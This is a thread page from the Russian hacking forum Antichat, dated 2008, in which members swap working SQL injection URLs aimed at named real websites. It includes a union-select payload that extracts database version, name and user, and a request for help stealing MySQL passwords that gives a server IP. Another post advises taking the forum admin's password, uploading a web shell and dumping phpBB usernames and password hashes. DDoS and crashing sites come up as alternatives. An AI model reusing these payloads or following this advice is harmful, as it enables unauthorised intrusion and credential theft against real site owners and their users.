HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2941  
Старый 12.08.2008, 11:10
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Цитата:
Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется...
А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?
 
Ответить с цитированием

  #2942  
Старый 12.08.2008, 11:32
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!

есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
 
Ответить с цитированием

  #2943  
Старый 12.08.2008, 12:01
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами: 9618766

Репутация: 5
По умолчанию

я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?
 
Ответить с цитированием

  #2944  
Старый 12.08.2008, 12:23
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами: 9618766

Репутация: 5
По умолчанию

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
 
Ответить с цитированием

  #2945  
Старый 12.08.2008, 12:25
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

superboys, прав не хватит на чтение mysql.user
 
Ответить с цитированием

  #2946  
Старый 12.08.2008, 12:27
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами: 9618766

Репутация: 5
По умолчанию

это в каком сообщение 1 или 2?)
 
Ответить с цитированием

  #2947  
Старый 12.08.2008, 12:33
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Ко второму.
К первому нужны права на чтение файлов.
 
Ответить с цитированием

  #2948  
Старый 12.08.2008, 12:35
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами: 9618766

Репутация: 5
По умолчанию

ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
 
Ответить с цитированием

  #2949  
Старый 12.08.2008, 12:42
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Оставь как есть или напиши администратору о дырке.
 
Ответить с цитированием

  #2950  
Старый 12.08.2008, 13:49
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

Цитата:
Сообщение от superboys  
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)

попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*

это для технической информации

также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.